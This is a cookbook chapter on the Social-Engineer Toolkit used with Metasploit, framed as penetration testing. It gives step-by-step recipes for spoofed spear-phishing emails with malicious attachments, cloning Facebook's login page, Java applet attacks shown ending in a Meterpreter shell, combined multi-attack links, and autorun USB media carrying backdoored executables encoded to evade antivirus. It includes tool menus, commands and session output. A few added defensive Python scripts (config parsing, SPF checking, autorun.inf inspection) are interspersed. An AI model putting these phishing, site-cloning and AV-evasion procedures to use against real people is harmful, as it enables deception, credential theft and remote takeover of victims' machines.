Metasploit Penetration Testing Cookbook, Second Edition
In this article by Monika Agarwal, the author of the book Metasploit Penetration Testing Cookbook Second Edition, we will cover:
- Getting started with the Social-Engineer Toolkit (SET)
- Working with the SET config file
- Working with the spear-phishing attack vector
- Website attack vectors
- Working with the multi-attack web method
- Infectious media generator
Social engineering is the act of manipulating people into performing actions that they do not intend to perform. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or to some other malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing an unintentionally malicious action. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario in which the victim is tricked into revealing his/her login information through a fake login/phishing page.
The Social-Engineer Toolkit is designed to perform such tricking activities. Just as we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans that breaks their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the various aspects of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering.
Getting started with the Social-Engineer Toolkit (SET)
Let's start our introductory recipe about SET, where we will be discussing SET on different platforms.
SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article.
How to do it...
To launch SET on BackTrack, open a terminal window, change to the SET directory, and run the toolkit:
root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET)
All rights reserved.
Select from the menu:
If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use.
The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit.
How it works...
SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET.
Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps:
- First, remove the old SET using the following command:
dpkg -r set
We can remove SET in two ways. First, we can change to /pentest/exploits/set, make sure we are in that directory, and then use the rm command to remove all the files present there. Or, we can use the dpkg method shown previously.
- Then, for reinstallation, we can clone the repository using the following command:
git clone https://github.com/trustedsec/social-engineer-toolkit /set
Working with the SET config file
In this recipe, we will take a close look at the SET config file, which contains default values for different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file.
To work with the config file, move to the SET directory and open the set_config file:
root@bt:/pentest/exploits/set# nano config/set_config
The configuration file will be launched with some introductory statements, as shown in the following screenshot:
How to do it...
Let's go through it step-by-step:
- First, we will see what configuration settings are available for us:

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework:

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

Ettercap is a multipurpose sniffer for switched LANs. The Ettercap section can be used to perform LAN attacks such as DNS poisoning and spoofing. The above SET settings can be used to turn Ettercap ON or OFF depending on the requirement.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
- The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF.
The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack:
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install

We will discuss this attack vector in detail in a later recipe, that is, the Spear-phishing attack vector. This attack vector will also require the JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail:

SELF_SIGNED_APPLET=ON
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
- The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/Port forwarding, and it allows you to connect to the external Internet.
The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance:
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
- The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF:
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
- The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user:
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
- The following setting is used to enable or disable the Metasploit listener once the attack is executed:
# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
AUTOMATIC_LISTENER=ON
- The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance:
# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
METASPLOIT_MODE=ON
These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the SET.
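As an added illustration of the file format walked through above (this is not code from the book or from the SET project), the following Python script parses a set_config-style file into a dictionary, separates the ON/OFF switches from path and interface settings, and reports which configured directories are missing on the local machine. The sample configuration embedded in it is constructed from the excerpts shown in this recipe; the function names are our own.

```python
"""Parse a set_config-style file (KEY=VALUE lines, '#' comments).

Added example, not part of the SET project. It reads the format shown in
this recipe into a dict and separates ON/OFF flags from other settings so
that a toolkit configuration can be reviewed before it is used.
"""
import os

# Constructed sample reproducing the layout of the excerpts in the recipe.
SAMPLE_CONFIG = """\
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
SELF_SIGNED_APPLET=ON
AUTO_DETECT=ON
APACHE_SERVER=OFF
APACHE_DIRECTORY=/var/www
WEBATTACK_SSL=OFF
# SELF_SIGNED_CERT=OFF
AUTOMATIC_LISTENER=ON
METASPLOIT_MODE=ON
"""


def parse_set_config(text):
    """Return {KEY: value} for every uncommented KEY=VALUE line.

    Comment lines (starting with '#') and blank lines are skipped, so the
    commented-out SELF_SIGNED_CERT line in the sample is NOT a setting, and
    neither is the 'EXAMPLE: ETTERCAP_INTERFACE=wlan0' comment.
    """
    settings = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" not in line:
            raise ValueError(f"line {lineno}: expected KEY=VALUE, got {line!r}")
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def split_flags_and_paths(settings):
    """Separate ON/OFF switches (as booleans) from everything else."""
    flags = {k: v.upper() == "ON" for k, v in settings.items()
             if v.upper() in ("ON", "OFF")}
    other = {k: v for k, v in settings.items() if k not in flags}
    return flags, other


def missing_paths(settings):
    """Names of *_PATH / *_DIRECTORY settings whose directory does not exist."""
    return sorted(k for k, v in settings.items()
                  if (k.endswith("_PATH") or k.endswith("_DIRECTORY"))
                  and not os.path.isdir(v))


if __name__ == "__main__":
    cfg = parse_set_config(SAMPLE_CONFIG)
    flags, other = split_flags_and_paths(cfg)
    print("flags ON :", sorted(k for k, on in flags.items() if on))
    print("flags OFF:", sorted(k for k, on in flags.items() if not on))
    print("other    :", other)
    print("missing  :", missing_paths(cfg))
```

Run it against the real file with parse_set_config(open("config/set_config").read()); a missing Metasploit directory in the output is the most common cause of the "misconfigured SET file" errors the next section mentions.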
How it works...
The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file.
Working with the spear-phishing attack vector
A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command:
root@bt:~# apt-get install sendmail
Reading package lists... Done
Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works.
Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF records validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <email@example.com>, arrives from the IP 18.104.22.168, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list. As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible.
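The recipient-side check described above, that a message's origin IP must belong to the domain it claims to come from, is what SPF record validation does. The following Python function is an added example (not code from the book or from SET) that evaluates a sender IP against a published SPF record in the way a receiving mail server would; the records and addresses are constructed, and only the ip4, ip6 and all mechanisms are implemented, with the record supplied as a string so that it runs offline. The address 18.104.22.168 from the paragraph is used as the spoofed-origin case.

```python
"""Evaluate a sender IP against an SPF record, as a receiving mail server does.

Added example, not part of SET or the book. Supports the ip4/ip6/all
mechanisms with qualifiers and takes the record as a string; a full
implementation resolves the domain's TXT record and also handles
include/a/mx/redirect (RFC 7208).
"""
import ipaddress

# Constructed records: a strict policy and a "soft fail" policy.
RECORD_STRICT = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 -all"
RECORD_SOFT = "v=spf1 ip4:203.0.113.10 ~all"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(record, sender_ip):
    """Return 'pass', 'fail', 'softfail', 'neutral', 'none' or 'permerror'.

    'none' means the record is not an SPF policy at all; 'permerror' means
    the record uses a mechanism this offline evaluator does not support.
    """
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"                      # implicit '+' when none is given
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            return QUALIFIERS[qualifier]     # catch-all decides the rest
        if mech in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
        else:
            # include/a/mx/exists/redirect need DNS lookups; not handled here.
            return "permerror"
    return "neutral"                         # nothing matched, no 'all' term


def should_flag(record, sender_ip):
    """True when the receiving server should mark the message as spoofed."""
    return check_spf(record, sender_ip) == "fail"


if __name__ == "__main__":
    for ip in ("203.0.113.77", "18.104.22.168", "2001:db8:1::5"):
        print(ip, "->", check_spf(RECORD_STRICT, ip))
```

With RECORD_STRICT, 203.0.113.77 passes and 18.104.22.168 fails, which is exactly the outcome the paragraph describes for a spoofed message arriving from an address outside the domain's published senders.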
Spear-phishing attacks are of two types—web-based content and payload-based content.
How to do it...
The spear-phishing module has three different attack vectors at our disposal:
Let's analyze each of them.
Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options include starting a VNC server, executing the payload and starting a command line, and so on.
The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack:
Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server:
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>1
set:phishing> From address (ex: firstname.lastname@example.org):email@example.com
set:phishing> Flag this message/s as high priority? [yes|no]:y
Setting up your own server may not be very reliable, as most mail services perform a reverse lookup to make sure that the e-mail originated from the same domain as the sender address.
Let's analyze another attack vector of spear-phishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as it is difficult to detect whether such files are malicious or not, so they can be sent as an attachment via e-mail:
set:phishing> Setup a listener [yes|no]:y
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system.
The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential.
How it works...
As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail contains a malicious attachment, which exploits a known vulnerability on the target machine and provides shell connectivity to the attacker. SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
Website attack vectors
The SET web attack vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. It is, by far, the most popular attack vector of SET. It works similarly to browser autopwn, where several (or specific) attacks can be sent to the target browser. It has the following attack vectors:
Here, in this recipe, we will discuss the most popular attack vector, the Java applet attack method. Let's see how this attack is performed using SET.
To start with the Java applet attack method, we will have to select the first option. Then, in the next step, we will be prompted to choose a webpage setup. We can either choose custom templates or clone a complete URL. Let's see how cloning will help us in performing the attack:
How to do it...
The target user will have to access the website that the pentester has decided to clone. Hence, the pentester should understand that the cloned site, that is, the phishing site, should not deviate from the functionality of the actual site.
- To start with the cloning option, we will have to decide on a URL we want to clone. Let's clone the Facebook login page and proceed further:
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to the main menu
Enter number (1-4): 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
- Once we are done with the cloning part, we will be prompted to choose a payload along with a backdoor that can be dropped onto the target machine.
- Once we're done with these steps, the SET web server will start along with MSF. MSF will manage the handler that will receive the back connection once the payload is dropped onto the target machine.
- You can find your cloned template along with the jar at /pentest/exploits/set/src/web_clone/site/template. Now, once the target user visits the cloned website (hosted on a fake domain), an applet message will pop up that will appear as a completely safe alert message:
- Now, once the target user clicks on Allow, the malicious applet gets executed and it allows the execution of the payload. The Metasploit listener will receive a connection back from the target machine and thus, we will have an active session:
[*] Sending stage (748544 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.103:443 -> Thu Sep 09 10:06:57 -0400 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 6.1]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Similarly, we can perform other attacks as well. You can see how easily SET creates attack vectors for us and provides us with complete control over our scenario. The best thing about SET is that it can give you the full opportunity to implement your own modifications and changes whenever you want.
How it works...
The Java applet infection is a popular Java applet vulnerability that allows the execution of the applet outside the protected sandbox environment. Unsigned, or unsafe, applets are executed in a sandbox environment with limited access to system resources. Once the malicious applet is allowed to execute after the warning message, it gains the privilege of full resource access on the target machine, as it is now outside the sandbox environment. This allows the applet to exploit the Java vulnerability and achieve remote code execution. Similarly, other web-based attack vectors use a browser to transfer attacks to the target system. Social engineering again lies in the art of crafting a scenario that fools the user. The attacker can create a malicious link hidden behind an href attribute, or the applet can be signed using fake signatures in order to make it look completely legitimate. SET templates are a good source for designing attacks.
Working with the multi-attack web method
The multi-attack web method takes web attacks to the next level by combining several attacks into one. This attack method allows us to club several exploits and vulnerabilities together under a single format. Once the file or URL is opened by the target user, each attack is thrown one by one until a successful attack is reported. SET automates the process of clubbing different attacks under a single web attack scenario. Let us move ahead and see how this is done.
How to do it...
The multi-attack web method begins similar to other web-based attacks. We start with selecting a template which can either be imported or cloned. The difference lies in the next step, where we can select various exploits that can be added into the web attack:
Select which attacks you want to use:
1. The Java Applet Attack Method (OFF)
2. The Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.
Enter your choice one at a time (hit 8 when finished selecting):
We can select different attacks, and once we are done, we can pass 8 and finally combine the selected attacks under a single vector. Finally, we will be prompted to select a payload and backdoor encoder.
How it works...
Once different attacks have been selected, SET clubs them together with a payload and builds a single malicious link that now needs to be socially engineered. We will have to build a template that looks completely legitimate to the target user and persuade him or her to visit the malicious link. Once the link is clicked by the victim, the different attacks are tried one by one until a successful attack is launched. Once a vulnerability is found and exploited, the payload provides back connectivity to the Metasploit listener.
Infectious media generator
The infectious media generator is a relatively simple attack vector. SET will create a Metasploit-based payload, set up a listener for you, and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if auto-run is enabled, the code will automatically execute and take control of the machine.
How to do it...
This attack vector is based on a simple principle of generating a malicious executable, and then encoding it with available encoders, so as to bypass antivirus protection. The following are some examples of infectious media generators with their description as well:
1. Windows Shell Reverse_TCP: Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter: Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL: Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell: Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64: Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64: Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64: Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster: Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable: Specify a path for your own executable
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few
[-] Backdoor completed successfully. Payload is now hidden within a legit
[*] Your attack has been created in the SET home directory folder
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.
[*] Do you want to start the listener now? yes or no: yes
[*] Please wait while the Metasploit listener is loaded...
How it works...
After generating the encoded malicious file, the Metasploit listener starts waiting for back connections. The only limitation with this attack is that the removable media must have auto-run enabled; otherwise, it will require a manual trigger.
This type of attack vector can be helpful in situations where the target user is behind a firewall. Most antivirus programs nowadays disable auto-run, which in turn renders this type of attack useless. Along with autorun-based attacks, the pentester should also ensure that a backdoored legitimate executable/PDF is provided on the media. This would ensure that the victim would invariably execute one of the payloads.
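Because this vector stands or falls on the autorun.inf that SET writes to the media, the file is also the first thing a defender or incident responder inspects when removable media is found. The following Python script is an added example (not code from the book or from SET) that parses an autorun.inf with the standard library, reports which program the open and shellexecute keys would launch, whether that program is actually present on the media, and whether the action text imitates the Windows default "open folder" prompt. The autorun.inf content and the media file list are constructed for the demonstration.

```python
"""Inspect an autorun.inf from removable media before the media is trusted.

Added example, not SET code. autorun.inf is an INI-style file whose
[autorun] section tells Windows what to launch (open= / shellexecute=) and
what to show in the AutoPlay dialog (action= / label= / icon=). This parser
reports what the file would run so an analyst can decide before opening it.
"""
import configparser

# Constructed sample resembling media produced by an infectious-media tool.
SAMPLE_AUTORUN = """\
[autorun]
open=setup.exe /s
icon=setup.exe,0
action=Open folder to view files
label=Holiday photos
"""

EXECUTABLE_SUFFIXES = (".exe", ".bat", ".cmd", ".scr", ".pif", ".com", ".vbs", ".js")


def parse_autorun(text):
    """Return the [autorun] section as a dict with lowercase keys ({} if absent)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    # Section names are case-sensitive in configparser; autorun.inf is not.
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    return dict(cp[section]) if section else {}


def review_autorun(text, media_files=()):
    """List findings about what this autorun.inf would launch or display.

    media_files: file names present in the media root (constructed in the
    demo), used to tell whether the referenced program ships on the media.
    """
    entries = parse_autorun(text)
    names_on_media = {f.lower() for f in media_files}
    findings = []
    for key in ("open", "shellexecute"):
        if key not in entries:
            continue
        parts = entries[key].strip().split()       # drop command-line arguments
        if not parts:
            continue
        target = parts[0].strip('"')
        findings.append({
            "key": key,
            "target": target,
            "executable": target.lower().endswith(EXECUTABLE_SUFFIXES),
            "present_on_media": target.lower() in names_on_media,
        })
    action = entries.get("action", "")
    if any(phrase in action.lower() for phrase in ("open folder", "view files")):
        findings.append({
            "key": "action",
            "target": action,
            "executable": False,
            "present_on_media": None,
            "note": "action text imitates the Windows default AutoPlay prompt",
        })
    return findings


def launches_program(findings):
    """True when open= or shellexecute= points at an executable file type."""
    return any(f["executable"] for f in findings
               if f["key"] in ("open", "shellexecute"))


if __name__ == "__main__":
    results = review_autorun(SAMPLE_AUTORUN,
                             media_files=["autorun.inf", "setup.exe", "photos"])
    for finding in results:
        print(finding)
    print("launches a program:", launches_program(results))
```

On the sample, the open key resolves to setup.exe, which is present on the media, and the action text matches the default prompt wording, which is the combination the recipe relies on to get the payload clicked. An endpoint that has AutoPlay disabled never evaluates this file at all, which is the mitigation the text above notes.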
This article on the Social-Engineer Toolkit explains social engineering, which is the act of manipulating people into performing actions that they do not intend to perform. A cyber-based socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or to some other malicious activity. Just as we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans that breaks their own conscious security.
About the Author:
Monika Agarwal is a young Information Security Researcher from India. She has presented many research papers at both national and international conferences. She is a member of IAENG (International Association of Engineers). Her main areas of interest are ethical hacking and ad hoc networking.